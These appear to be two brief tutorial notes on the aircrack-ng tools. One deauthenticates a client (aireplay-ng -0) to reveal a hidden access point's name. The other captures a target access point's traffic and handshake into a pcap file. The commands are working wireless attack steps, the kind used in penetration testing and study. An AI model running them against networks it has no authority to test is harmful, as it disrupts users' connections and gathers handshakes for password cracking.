airodump-ng

Determine Hiiden AP's Name

Submitted by rbosaz on Tue, 10/25/2022 - 11:39

First put WLAN in monitoring mode.

Using the following command, find an AP where its essid is <length:  0>:

airodump-nd <WLAN Name>

Now gather data from the zero length essid AP using the following command:

airodump-ng -c <AP_0 Channel> --bssid <AP_0 MAC> <WLAN Name>

Where: AP_0 = Zero Length AP.

Open up another terminal and disconnect one of the clients attached to the zero length AP:

aireplay-ng -0 3 -a <AP_0 MAC> -c <Client MAC> <WLAN Name>

Once disconnected notice the essid of the AP_0 display a name.

 

Capture Data from Target AP

Submitted by rbosaz on Tue, 10/25/2022 - 11:19

Once you find an AP target execute the following command to capture data from the AP:

sudo airodump-ng --channel <Target AP's Channel> --bssid <Target AP's MAC> --write <Output File Name> <Your WLAN Name>

You can quit using ctrl+c or hitting 'q' twice.

The above command will create the following files:

  • <Output File Name>.csv
  • <Output File Name>.pcap: this file will have the handshake information
  • <Output File Name>.kismet.csv
  • <Output File Name>.kismet.netxml